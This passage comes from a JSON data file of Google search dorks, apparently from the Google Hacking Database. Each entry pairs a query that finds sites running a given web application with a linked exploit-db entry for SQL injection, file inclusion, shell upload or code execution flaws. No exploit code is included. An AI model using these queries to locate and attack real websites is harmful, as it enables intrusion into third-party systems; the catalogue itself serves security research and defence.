"inurl:\"com_eventcal\"", "long description": "Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14187", "submited": "2010-11-15", "request": "inurl:\"com_eventcal\"", "id": 2743}, {"short description": "\"and Powered By :Sansak\"", "long description": "WebBoard 2.0 Arbitrary SQL Question/Anwser Delete Vulnerability: http://www.exploit-db.com/exploits/6303", "submited": "2010-11-15", "request": "\"and Powered By :Sansak\"", "id": 2744}, {"short description": "inurl:profile.php?mode=", "long description": "PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability): http://www.exploit-db.com/exploits/14440", "submited": "2010-11-15", "request": "inurl:profile.php?mode=", "id": 2746}, {"short description": "Powered By SalSa Creations", "long description": "ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability - CVE: 2008-5489: http://www.exploit-db.com/exploits/7128", "submited": "2010-11-15", "request": "Powered By SalSa Creations", "id": 2747}, {"short description": "inurl:modules.php?op= \"pollID\"", "long description": "MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection Vulnerability - CVE: 2009-2618: http://www.exploit-db.com/exploits/9021", "submited": "2010-11-15", "request": "inurl:modules.php?op= \"pollID\"", "id": 2748}, {"short description": "\"Powered by SazCart\"", "long description": "SazCart 1.5.1 (prodid) Remote SQL Injection - CVE: 2008-2411: http://www.exploit-db.com/exploits/5576", "submited": "2010-11-15", "request": "\"Powered by SazCart\"", "id": 2749}, {"short description": "intext:\"Powered by Max.Blog\"", "long description": "Max.Blog 1.0.6 (offline_auth.php) Offline Authentication Bypass - CVE: 2009-0409: http://www.exploit-db.com/exploits/7899", "submited": "2010-11-15", "request": "intext:\"Powered by Max.Blog\"", "id": 2750}, {"short description": "\"Powered by CMSimple\"", "long description": "CMSimple 3.1 Local File Inclusion / Arbitrary File Upload - CVE: 2008-2650: http://www.exploit-db.com/exploits/5700", "submited": "2010-11-15", "request": "\"Powered by CMSimple\"", "id": 2751}, {"short description": "inurl:\"com_performs\"", "long description": "perForms Mambo Component 1.0 Remote File Inclusion - CVE: 2006-3774: http://www.exploit-db.com/exploits/2025", "submited": "2010-11-15", "request": "inurl:\"com_performs\"", "id": 2752}, {"short description": "inurl:\"com_mambowiki\"", "long description": "Mambo MamboWiki Component 0.9.6 Remote Include Vulnerability - CVE: 2006-4282: http://www.exploit-db.com/exploits/2213", "submited": "2010-11-15", "request": "inurl:\"com_mambowiki\"", "id": 2753}, {"short description": "index.asp?archivio=OK", "long description": "Ublog access version Arbitrary Database Disclosure: http://www.exploit-db.com/exploits/8610", "submited": "2010-11-15", "request": "index.asp?archivio=OK", "id": 2754}, {"short description": "album.asp?pic= .jpg cat=", "long description": "aspWebAlbum 3.2 Multiple Remote Vulnerabilities - CVE: 2008-6977: http://www.exploit-db.com/exploits/6420", "submited": "2010-11-15", "request": "album.asp?pic= .jpg cat=", "id": 2755}, {"short description": "\"Multi-Page Comment System\"", "long description": "Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability - CVE: 2008-2293: http://www.exploit-db.com/exploits/5630", "submited": "2010-11-15", "request": "\"Multi-Page Comment System\"", "id": 2757}, {"short description": "inurl:\"com_wmtpic\"", "long description": "Joomla Component com_wmtpic 1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14128", "submited": "2010-11-15", "request": "inurl:\"com_wmtpic\"", "id": 2759}, {"short description": "inurl:index.php?mode=game_player", "long description": "Tycoon CMS Record Script SQL Injection Vulnerability - CVE: 2010-3027: http://www.exploit-db.com/exploits/14572", "submited": "2010-11-15", "request": "inurl:index.php?mode=game_player", "id": 2760}, {"short description": "\"pages.php?page_ID=\" \"K9 Kreativity\"", "long description": "K9 Kreativity Design (pages.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12866", "submited": "2010-11-15", "request": "\"pages.php?page_ID=\" \"K9 Kreativity\"", "id": 2761}, {"short description": "album.asp?pic= .jpg cat=", "long description": "aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6977: http://www.exploit-db.com/exploits/6357", "submited": "2010-11-15", "request": "album.asp?pic= .jpg cat=", "id": 2763}, {"short description": "inurl:\"option=com_simpleshop\" &amp; inurl:\"viewprod\"", "long description": "Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14501", "submited": "2010-11-15", "request": "inurl:\"option=com_simpleshop\" &amp; inurl:\"viewprod\"", "id": 2764}, {"short description": "intext:\"Powered by Community CMS\"", "long description": "Community CMS 0.5 Multiple SQL Injection Vulnerabilities - CVE: 2009-4794: http://www.exploit-db.com/exploits/8323", "submited": "2010-11-15", "request": "intext:\"Powered by Community CMS\"", "id": 2765}, {"short description": "\"Powered by Scallywag\"", "long description": "Scallywag (template.php path) Remote File Inclusion Vulnerabilities - CVE: 2007-2900: http://www.exploit-db.com/exploits/3972", "submited": "2010-11-15", "request": "\"Powered by Scallywag\"", "id": 2766}, {"short description": "inurl:\"phshoutbox.php\"", "long description": "PhShoutBox 1.5 (final) Insecure Cookie Handling Vulnerability - CVE: 2008-1971: http://www.exploit-db.com/exploits/5467", "submited": "2010-11-15", "request": "inurl:\"phshoutbox.php\"", "id": 2767}, {"short description": "\"index.php?option=com_seyret\" / \"com_seyret\"", "long description": "Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/14183", "submited": "2010-11-15", "request": "\"index.php?option=com_seyret\" / \"com_seyret\"", "id": 2769}, {"short description": "inurl:inc_memberdirectorymanager.asp", "long description": "DMXReady Member Directory Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0427: http://www.exploit-db.com/exploits/7773", "submited": "2010-11-15", "request": "inurl:inc_memberdirectorymanager.asp", "id": 2770}, {"short description": "inurl:\"mod=notizie\"", "long description": "XCMS 1.83 Remote Command Execution - CVE: 2007-6652: http://www.exploit-db.com/exploits/4813", "submited": "2010-11-15", "request": "inurl:\"mod=notizie\"", "id": 2771}, {"short description": "\"Powered By ScozNews\"", "long description": "ScozNews 1.2.1 (mainpath) Remote File Inclusion Vulnerability - CVE: 2006-2487: http://www.exploit-db.com/exploits/1800", "submited": "2010-11-15", "request": "\"Powered By ScozNews\"", "id": 2772}, {"short description": "\"PHP BP Team\"", "long description": "phpBP RC3 (2.204) FIX4 Remote SQL Injection Vulnerability - CVE: 2008-1408: http://www.exploit-db.com/exploits/5263", "submited": "2010-11-15", "request": "\"PHP BP Team\"", "id": 2774}, {"short description": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "long description": "PhpWebGallery 1.3.4 (XSS/LFI) Multiple Vulnerabilities - CVE: 2008-4591: http://www.exploit-db.com/exploits/6425", "submited": "2010-11-15", "request": "inurl:\"picture.php?cat=\" \"Powered by PhpWebGallery 1.3.4\"", "id": 2775}, {"short description": "inurl:\"zcat.php?id=\"", "long description": "IRAN N.E.T E-commerce Group SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10350", "submited": "2010-11-15", "request": "inurl:\"zcat.php?id=\"", "id": 2776}, {"short description": "inurl:K-Search, Powered By K-Search", "long description": "K-Search (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2010-2457: http://www.exploit-db.com/exploits/13993", "submited": "2010-11-15", "request": "inurl:K-Search, Powered By K-Search", "id": 2777}, {"short description": "\"index.php?option=com_chronoconnectivity\" / \"com_chronoconnectivity\"", "long description": "Joomla Component ChronoConnectivity: http://www.exploit-db.com/exploits/12842", "submited": "2010-11-15", "request": "\"index.php?option=com_chronoconnectivity\" / \"com_chronoconnectivity", "id": 2778}, {"short description": "Powered by cP Creator v2.7.1", "long description": "cP Creator v2.7.1 Remote Sql Injection - CVE: 2009-3330: http://www.exploit-db.com/exploits/9726", "submited": "2010-11-15", "request": "Powered by cP Creator v2.7.1", "id": 2781}, {"short description": "inurl:\"com_mscomment\"", "long description": "Joomla Component MS Comment LFI Vulnerability - CVE: 2010-2050: http://www.exploit-db.com/exploits/12611", "submited": "2010-11-15", "request": "inurl:\"com_mscomment\"", "id": 2782}, {"short description": "Powered by  Mitra Informatika Solusindo", "long description": "Mitra Informatika Solusindo cart Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5214", "submited": "2010-11-15", "request": "Powered by  Mitra Informatika Solusindo", "id": 2784}, {"short description": "2009 Satellite-X", "long description": "Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11962", "submited": "2010-11-15", "request": "2009 Satellite-X", "id": 2785}, {"short description": "\"Powered by bSpeak 1.10\"", "long description": "bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability - CVE: 2009-1747: http://www.exploit-db.com/exploits/8751", "submited": "2010-11-15", "request": "\"Powered by bSpeak 1.10\"", "id": 2787}, {"short description": "Powered by osCommerce", "long description": "osCommerce Online Merchant 2.2 RC2a Code Execution: http://www.exploit-db.com/exploits/9556", "submited": "2010-11-15", "request": "Powered by osCommerce", "id": 2789}, {"short description": "inurl:choosecard.php?catid=", "long description": "post Card ( catid ) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11892", "submited": "2010-11-15", "request": "inurl:choosecard.php?catid=", "id": 2790}, {"short description": "inurl:\"com_jphoto\"", "long description": "Joomla Component com_jphoto SQL Injection Vulnerability - (id) - CVE: 2009-4598: http://www.exploit-db.com/exploits/10367", "submited": "2010-11-15", "request": "inurl:\"com_jphoto\"", "id": 2791}, {"short description": "allinurl: e107_plugins/easyshop/easyshop.php", "long description": "e107 Plugin EasyShop (category_id) Blind SQL Injection - CVE: 2008-4786: http://www.exploit-db.com/exploits/6852", "submited": "2010-11-15", "request": "allinurl: e107_plugins/easyshop/easyshop.php", "id": 2792}, {"short description": "inurl:\"com_koesubmit\"", "long description": "Mambo com_koesubmit 1.0.0 Remote File Inclusion - CVE: 2009-3333: http://www.exploit-db.com/exploits/9714", "submited": "2010-11-15", "request": "inurl:\"com_koesubmit\"", "id": 2793}, {"short description": "Powered by PHP Advanced Transfer Manager v1.10 - @2002 Bugada Andrea", "long description": "PHP Advanced Transfer Manager v1.10 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11613", "submited": "2010-11-15", "request": "Powered by PHP Advanced Transfer Manager v1.10 - @2002 Bugada Andrea", "id": 2794}, {"short description": "inurl:add_soft.php", "long description": "Hotscripts Clone (cid) Remote SQL Injection Vulnerability - CVE: 2008-6405: http://www.exploit-db.com/exploits/6545", "submited": "2010-11-15", "request": "inurl:add_soft.php", "id": 2795}, {"short description": "\"Powered by Absolute Podcast\"", "long description": "Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability - CVE: 2008-6857: http://www.exploit-db.com/exploits/6882", "submited": "2010-11-15", "request": "\"Powered by Absolute Podcast\"", "id": 2796}, {"short description": "Powered by iScripts EasyBiller", "long description": "iScripts easybiller v1.1 sqli vulnerability: http://www.exploit-db.com/exploits/13741", "submited": "2010-11-15", "request": "Powered by iScripts EasyBiller", "id": 2797}, {"short description": "\"Copyright-2008@zeejobsite.com\"", "long description": "ZEEJOBSITE 2.0 Remote File Upload Vulnerability - CVE: 2008-6913: http://www.exploit-db.com/exploits/7062", "submited": "2010-11-15", "request": "\"Copyright-2008@zeejobsite.com\"", "id": 2798}, {"short description": "\"Powered By phpCOIN v1.2.1\" / \"mod.php?mod=faq\"", "long description": "phpCOIN 1.2.1 (mod.php) LFI Vulnerability - CVE: 2010-0953: http://www.exploit-db.com/exploits/11641", "submited": "2010-11-15", "request": "\"Powered By phpCOIN v1.2.1\" / \"mod.php?mod=faq\"", "id": 2799}, {"short description": "inurl:\"index.php?option=com_jp_jobs\"", "long description": "Joomla component jp_jobs SQL Injection Vulnerability - CVE: 2010-1350: http://www.exploit-db.com/exploits/12037", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_jp_jobs\"", "id": 2800}, {"short description": "allinurl: Category.php?IndustrYID=", "long description": "CmS (id) SQL Injection Vulnerability - CVE: 2009-2439: http://www.exploit-db.com/exploits/12333", "submited": "2010-11-15", "request": "http://www.google.com/search?source=ig&amp;hl=fr&amp;rlz=&amp;q=allinurl:+Category.php%3FIndustrYID%3D", "id": 2801}, {"short description": "index2.php?option=com_joomlaboard", "long description": "Joomla Component Joomlaboard 1.1.1 (sbp) RFI Vulnerability: http://www.exploit-db.com/exploits/3560", "submited": "2010-11-15", "request": "index2.php?option=com_joomlaboard", "id": 2802}, {"short description": "intext:\"Powered By WorldPay\" inurl:productdetail.php", "long description": "WorldPay Script Shop (productdetail) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10976", "submited": "2010-11-15", "request": "intext:\"Powered By WorldPay\" inurl:productdetail.php", "id": 2803}, {"short description": "inurl:\"cameralife/index.php\"", "long description": "Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6087: http://www.exploit-db.com/exploits/6710", "submited": "2010-11-15", "request": "inurl:\"cameralife/index.php\"", "id": 2804}, {"short description": "inurl:option=com_huruhelpdesk", "long description": "joomla component allvideos BLIND SQL injection Vulnerability: http://www.exploit-db.com/exploits/12137", "submited": "2010-11-15", "request": "inurl:option=com_huruhelpdesk", "id": 2805}, {"short description": "inurl:inc_membersareamanager.asp", "long description": "DMXReady Members Area Manager 1.2 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7774", "submited": "2010-11-15", "request": "inurl:inc_membersareamanager.asp", "id": 2806}, {"short description": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "long description": "Moa Gallery 1.2.0 Multiple Remote File Inclusion Vulnerabilities - CVE: 2009-4614: http://www.exploit-db.com/exploits/9522", "submited": "2010-11-15", "request": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "id": 2807}, {"short description": "inurl:/component/jesectionfinder/", "long description": "Joomla Component JE Section Finder LFI Vulnerability - CVE: 2010-2680: http://www.exploit-db.com/exploits/14064", "submited": "2010-11-15", "request": "inurl:/component/jesectionfinder/", "id": 2808}, {"short description": "intitle:phpMyAdmin", "long description": "phpMyAdmin Code Injection RCE - CVE: 2009-1151: http://www.exploit-db.com/exploits/8992", "submited": "2010-11-15", "request": "intitle:phpMyAdmin", "id": 2809}, {"short description": "inurl:\"com_phocagallery\"", "long description": "Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14207", "submited": "2010-11-15", "request": "inurl:\"com_phocagallery\"", "id": 2810}, {"short description": "inurl:\"member.php?page=comments\"", "long description": "6ALBlog (newsid) Remote SQL Injection Vulnerability - CVE: 2007-3451: http://www.exploit-db.com/exploits/4104", "submited": "2010-11-15", "request": "inurl:\"member.php?page=comments\"", "id": 2811}, {"short description": "''webboard question.asp QID''", "long description": "PORAR WEBBOARD (question.asp) Remote SQL Injection Vulnerability - CVE: 2008-1039: http://www.exploit-db.com/exploits/5185", "submited": "2010-11-15", "request": "&#039;&#039;webboard question.asp QID&#039;&#039;", "id": 2812}, {"short description": "inurl:\"index.php?option=com_ponygallery\"", "long description": "Joomla Component Pony Gallery 1.5 SQL Injection Vulnerability - CVE: 2007-4046: http://www.exploit-db.com/exploits/4201", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_ponygallery\"", "id": 2815}, {"short description": "inurl:\"com_dbquery\" OR \"index.php?option=com_dbquery\"", "long description": "Joomla Component DBQuery 1.4.1.1 RFI Vulnerability - CVE: 2008-6841: http://www.exploit-db.com/exploits/6003/", "submited": "2010-11-15", "request": "inurl:\"com_dbquery\" OR \"index.php?option=com_dbquery\"", "id": 2816}, {"short description": "Powered by Discuz! 1.0 2002, Crossday Studio of 11cn.org", "long description": "Discuz 1.03 SQL Injection Exploit Vulnerability: http://www.exploit-db.com/exploits/10861", "submited": "2010-11-15", "request": "Powered by Discuz! 1.0 2002, Crossday Studio of 11cn.org", "id": 2817}, {"short description": "Power by donghungx. Copyright 2008 AttMp3.com. All rights reserved.", "long description": "SongForever.com Clone Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11476", "submited": "2010-11-15", "request": "Power by donghungx. Copyright 2008 AttMp3.com. All rights reserved.", "id": 2818}, {"short description": "\"PowerMovieList 0.14 Beta Copyright\"", "long description": "PowerMovieList 0.14b (SQL/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8062", "submited": "2010-11-15", "request": "\"PowerMovieList 0.14 Beta Copyright\"", "id": 2821}, {"short description": "\"powered by MODx\"", "long description": "MODx CMS 0.9.2.1 (FCKeditor) Remote File Include Vulnerability - CVE: 2006-5730: http://www.exploit-db.com/exploits/2706/", "submited": "2010-11-15", "request": "\"powered by MODx\"", "id": 2822}, {"short description": "\"Powered by words tag script\"", "long description": "Words tag script 1.2 (word) Remote SQL Injection Vulnerability - CVE: 2008-3945: http://www.exploit-db.com/exploits/6336", "submited": "2010-11-15", "request": "\"Powered by words tag script\"", "id": 2824}, {"short description": "\"Powered by osCMax v2.0\" , \"Copyright @\" \"RahnemaCo.com\"", "long description": "osCMax 2.0 (fckeditor) Remote File Upload: http://www.exploit-db.com/exploits/11771", "submited": "2010-11-15", "request": "\"Powered by osCMax v2.0\" , \"Copyright @\" \"RahnemaCo.com\"", "id": 2825}, {"short description": "FrontAccounting", "long description": "FrontAccounting 1.12 Build 31 Remote File Inclusion Vulnerability - CVE: 2007-4279: http://www.exploit-db.com/exploits/4269", "submited": "2010-11-15", "request": "FrontAccounting", "id": 2827}, {"short description": "Powered by Egorix", "long description": "EPOLL SYSTEM 3.1 (password.dat) Disclosure: http://www.exploit-db.com/exploits/7864", "submited": "2010-11-15", "request": "Powered by Egorix", "id": 2828}, {"short description": "intext:\"Free Ecommerce Shopping Cart Software by ViArt\" +\"Your shopping cart is empty!\" + \"Products  Search\" +\"Advanced Search\" + \"All Categories\"", "long description": "ViArt Shopping Cart 3.5 Multiple Remote Vulnerabilities - CVE: 2008-6758: http://www.exploit-db.com/exploits/7628", "submited": "2010-11-15", "request": "intext:\"Free Ecommerce Shopping Cart Software by ViArt\" +\"Your shopping cart is empty!\" + \"Products  Search\" +\"Advanced Search\" + \"All Categories\"", "id": 2830}, {"short description": "\"powered by WonderEdit Pro\"", "long description": "WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities - CVE: 2006-3422: http://www.exploit-db.com/exploits/1982", "submited": "2010-11-15", "request": "\"powered by WonderEdit Pro\"", "id": 2831}, {"short description": "inurl:\"kgb19\"", "long description": "KGB 1.9 (sesskglogadmin.php) Local File Include - CVE: 2007-0337: http://www.exploit-db.com/exploits/3134", "submited": "2010-11-15", "request": "inurl:\"kgb19\"", "id": 2833}, {"short description": "allinurl:buyer/index.php?ProductID=", "long description": "Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12609", "submited": "2010-11-15", "request": "allinurl:buyer/index.php?ProductID=", "id": 2834}, {"short description": "\"powered by Sitellite\"", "long description": "Sitellite CMS 4.2.12 (559668.php) Remote File Inclusion Vulnerability - CVE: 2007-3228: http://www.exploit-db.com/exploits/4071", "submited": "2010-11-15", "request": "\"powered by Sitellite\"", "id": 2835}, {"short description": "\"PHP Link Portal v1.95.1 Big Resources, Inc.\"", "long description": "Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7644", "submited": "2010-11-15", "request": "\"PHP Link Portal v1.95.1 Big Resources, Inc.\"", "id": 2836}, {"short description": "[ Copyright 2005-2006 phpDirectorySource, all rights reserved ]", "long description": "phpDirectorySource (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4681: http://www.exploit-db.com/exploits/9226", "submited": "2010-11-15", "request": "[ Copyright 2005-2006 phpDirectorySource, all rights reserved ]", "id": 2841}, {"short description": "\"Powered by Comdev News Publisher\"", "long description": "Comdev News Publisher Remote SQL Injection Vulnerability - CVE: 2008-1872: http://www.exploit-db.com/exploits/5362", "submited": "2010-11-15", "request": "\"Powered by Comdev News Publisher\"", "id": 2843}, {"short description": "Powered By: AJ Square Inc", "long description": "AJ Article Persistent XSS Vulnerability - CVE: 2010-2917: http://www.exploit-db.com/exploits/14354", "submited": "2010-11-15", "request": "Powered By: AJ Square Inc", "id": 2844}, {"short description": "\"index.php?option=com_sef\" / \"com_sef\"", "long description": "Joomla Component Sef (com_sef) - LFI Vulnerability: http://www.exploit-db.com/exploits/14213", "submited": "2010-11-15", "request": "\"index.php?option=com_sef\" / \"com_sef\"", "id": 2845}, {"short description": "inurl:option=com_huruhelpdesk", "long description": "joomla component huruhelpdesk SQL injection Vulnerability: http://www.exploit-db.com/exploits/12124", "submited": "2010-11-15", "request": "inurl:option=com_huruhelpdesk", "id": 2846}, {"short description": "inurl:inc_securedocumentlibrary.asp", "long description": "DMXReady Secure Document Library 1.1 Remote SQL Injection Vuln - CVE: 2009-0428: http://www.exploit-db.com/exploits/7787", "submited": "2010-11-15", "request": "inurl:inc_securedocumentlibrary.asp", "id": 2847}, {"short description": "Powered by Dolphin", "long description": "Dolphin v7.0.3 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15400", "submited": "2010-11-15", "request": "Powered by Dolphin", "id": 2848}, {"short description": "inurl:\"php/showContent.php?linkid=\"", "long description": "Worldviewer.com CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12163", "submited": "2010-11-15", "request": "inurl:\"php/showContent.php?linkid=\"", "id": 2849}, {"short description": "sitou timou tumou tou", "long description": "Drunken:Golem Gaming Portal (admin_news_bot.php) RFI Vulnerability - CVE: 2009-4622: http://www.exploit-db.com/exploits/9635", "submited": "2010-11-15", "request": "sitou timou tumou tou", "id": 2850}, {"short description": "inurl:.asp?   Powered by Comersus ASP Shopping Cart", "long description": "Comersus ASP Shopping Cart (DD/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/7259", "submited": "2010-11-15", "request": "inurl:.asp?   Powered by Comersus ASP Shopping Cart", "id": 2852}, {"short description": "inurl:index.php?option=com_lowcosthotels", "long description": "Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln - CVE: 2008-5864: http://www.exploit-db.com/exploits/7567", "submited": "2010-11-15", "request": "inurl:index.php?option=com_lowcosthotels", "id": 2853}, {"short description": "Vibro-School CMS by nicLOR.net", "long description": "Vibro-School-CMS (nID) Remote SQL injection Vulnerability - CVE: 2008-6795: http://www.exploit-db.com/exploits/6981", "submited": "2010-11-15", "request": "Vibro-School CMS by nicLOR.net", "id": 2854}, {"short description": "\"Absolute Poll Manager XE\"", "long description": "Absolute Poll Manager XE 4.1 Cookie Handling Vulnerability - CVE: 2008-6860: http://www.exploit-db.com/exploits/6883", "submited": "2010-11-15", "request": "\"Absolute Poll Manager XE\"", "id": 2855}, {"short description": "Copyright 2010. Software Index", "long description": "PishBini Footbal XSS and SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14000", "submited": "2010-11-15", "request": "Copyright 2010. Software Index", "id": 2856}, {"short description": "inurl:\"com_linkdirectory\"", "long description": "Joomla Link Directory Component 1.0.3 Remote Include Vulnerability: http://www.exploit-db.com/exploits/2214", "submited": "2010-11-15", "request": "inurl:\"com_linkdirectory\"", "id": 2857}, {"short description": "inurl:com_manager", "long description": "Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12257", "submited": "2010-11-15", "request": "inurl:com_manager", "id": 2858}, {"short description": "\"Developed by Infoware Solutions\"", "long description": "My PHP Dating (success_story.php id) SQL Injection Vulnerability - CVE: 2008-4705: http://www.exploit-db.com/exploits/6754", "submited": "2010-11-15", "request": "\"Developed by Infoware Solutions\"", "id": 2859}, {"short description": "\"Powered by: Yes Solutions\"", "long description": "Yes Solutions - Webapp SQL Injection: http://www.exploit-db.com/exploits/11368", "submited": "2010-11-15", "request": "\"Powered by: Yes Solutions\"", "id": 2860}, {"short description": "allinurl:\"verliadmin\"", "long description": "VerliAdmin 0.3 (index.php) Remote File Include - CVE: 2006-6666: http://www.exploit-db.com/exploits/2944", "submited": "2010-11-15", "request": "allinurl:\"verliadmin\"", "id": 2861}, {"short description": "\"Powered by UNAK-CMS\"", "long description": "UNAK-CMS 1.5 (dirroot) Remote File Include Vulnerabilities - CVE: 2006-4890: http://www.exploit-db.com/exploits/2380", "submited": "2010-11-15", "request": "\"Powered by UNAK-CMS\"", "id": 2862}, {"short description": "inurl:\"com_quickfaq\"", "long description": "Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection Vulnerability - CVE: 2010-2845: http://www.exploit-db.com/exploits/14296", "submited": "2010-11-15", "request": "inurl:\"com_quickfaq\"", "id": 2863}, {"short description": "Powered by PBBoard 2009 Version 2.0.5", "long description": "PBBoard Version 2.0.5 Mullti Vulnerability: http://www.exploit-db.com/exploits/11570", "submited": "2010-11-15", "request": "Powered by PBBoard 2009 Version 2.0.5", "id": 2864}, {"short description": "\"Powered by EZCMS\"", "long description": "EZCMS 1.2 (bSQL/Admin Byapss) Multiple Remote Vulnerabilities - CVE: 2008-2921: http://www.exploit-db.com/exploits/5819", "submited": "2010-11-15", "request": "\"Powered by EZCMS\"", "id": 2865}, {"short description": "inurl:index.php?menu=adorder", "long description": "ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3944: http://www.exploit-db.com/exploits/6362", "submited": "2010-11-15", "request": "inurl:index.php?menu=adorder", "id": 2866}, {"short description": "allinurl:\"com_accombo\"", "long description": "Mambo Component accombo 1.x (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5279", "submited": "2010-11-15", "request": "allinurl:\"com_accombo\"", "id": 2867}, {"short description": "\"Powered by Scratcher\"", "long description": "Scratcher (SQL/XSS) Multiple Remote Vulnerability - CVE: 2010-1742: http://www.exploit-db.com/exploits/12458", "submited": "2010-11-15", "request": "\"Powered by Scratcher\"", "id": 2868}, {"short description": "inurl:/components/je-media-player.html?", "long description": "Joomla JE Media Player Component LFI Vulnerability: http://www.exploit-db.com/exploits/14060", "submited": "2010-11-15", "request": "inurl:/components/je-media-player.html?", "id": 2869}, {"short description": "\"Powered by How2asp\"", "long description": "How2ASP.net Webboard 4.1 Remote SQL Injection Vulnerability - CVE: 2008-2417: http://www.exploit-db.com/exploits/5638", "submited": "2010-11-15", "request": "\"Powered by How2asp\"", "id": 2870}, {"short description": "\"Powered by PHPBasket\"", "long description": "PHPBasket (product.php pro_id) SQL Injection Vulnerability - CVE: 2008-3713: http://www.exploit-db.com/exploits/6258", "submited": "2010-11-15", "request": "\"Powered by PHPBasket\"", "id": 2871}, {"short description": ": [allinurl: op=viewslink&amp;sid=]", "long description": "http://www.exploit-db.com/exploits/12514", "submited": "2010-11-15", "request": "", "id": 2872}, {"short description": "\"Forum Active Bulletin Board version 1.1 beta 2\"", "long description": "Active Bulletin Board", "submited": "2010-11-15", "request": "\"Forum Active Bulletin Board version 1.1 beta 2\"", "id": 2873}, {"short description": "inurl:module=My_eGallery pid", "long description": "MDPro Module My_eGallery (pid) Remote SQL Injection - CVE: 2009-0728: http://www.exploit-db.com/exploits/8100", "submited": "2010-11-15", "request": "inurl:module=My_eGallery pid", "id": 2874}, {"short description": "\"Powered by Dayfox Designs\"", "long description": "Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability - CVE: 2007-1525: http://www.exploit-db.com/exploits/3478", "submited": "2010-11-15", "request": "\"Powered by Dayfox Designs\"", "id": 2875}, {"short description": "Website powered by Subdreamer CMS &amp; Sequel Theme Designed by indiqo.media", "long description": "Subdreamer.v3.0.1 cms upload Vulnerability: http://www.exploit-db.com/exploits/11749", "submited": "2010-11-15", "request": "Website powered by Subdreamer CMS &amp; Sequel Theme Designed by indiqo.media", "id": 2876}, {"short description": "\"These forums are running on\" \"miniBB\"", "long description": "miniBB 2.1 (table) Remote SQL Injection Vulnerability - CVE: 2007-5719: http://www.exploit-db.com/exploits/4587", "submited": "2010-11-15", "request": "\"These forums are running on\" \"miniBB\"", "id": 2877}, {"short description": "\"PHPNews Version 0.93\"", "long description": "PHPNews 0.93 (format_menue) Remote File Inclusion Vulnerability - CVE: 2007-4232: http://www.exploit-db.com/exploits/4268", "submited": "2010-11-15", "request": "\"PHPNews Version 0.93\"", "id": 2878}, {"short description": "\"/nuke/iframe.php\"", "long description": "iFrame for Phpnuke (iframe.php) Remote File Inclusion Vulnerability - CVE: 2007-1626: http://www.exploit-db.com/exploits/3512", "submited": "2010-11-15", "request": "\"/nuke/iframe.php\"", "id": 2879}, {"short description": "Sad Raven's Click Counter v1.0", "long description": "Sad Raven's Click Counter 1.0 passwd.dat Disclosure: http://www.exploit-db.com/exploits/7844", "submited": "2010-11-15", "request": "Sad Raven&#039;s Click Counter v1.0", "id": 2880}, {"short description": "Powered by dB Masters' Curium CMS 1", "long description": "dB Masters Curium CMS 1.03 (c_id) Remote SQL Injection Vulnerability - CVE: 2007-0765: http://www.exploit-db.com/exploits/3256", "submited": "2010-11-15", "request": "Powered by dB Masters&#039; Curium CMS 1", "id": 2882}, {"short description": "Powered by XT-Commerce", "long description": "XT-Commerce v1 Beta 1 by Pass / Creat and Download Backup Vulnerability: http://www.exploit-db.com/exploits/12447", "submited": "2010-11-15", "request": "Powered by XT-Commerce", "id": 2883}, {"short description": "intext:\"Powered by Ramaas Software\"", "long description": "Ramaas Software CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12412", "submited": "2010-11-15", "request": "intext:\"Powered by Ramaas Software\"", "id": 2884}, {"short description": "Powered by Maian Greetings v2.1", "long description": "Maian Greetings v2.1 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11301", "submited": "2010-11-15", "request": "Powered by Maian Greetings v2.1", "id": 2885}, {"short description": "\"Yogurt build\"", "long description": "Yogurt 0.3 (XSS/SQL Injection) Multiple Remote 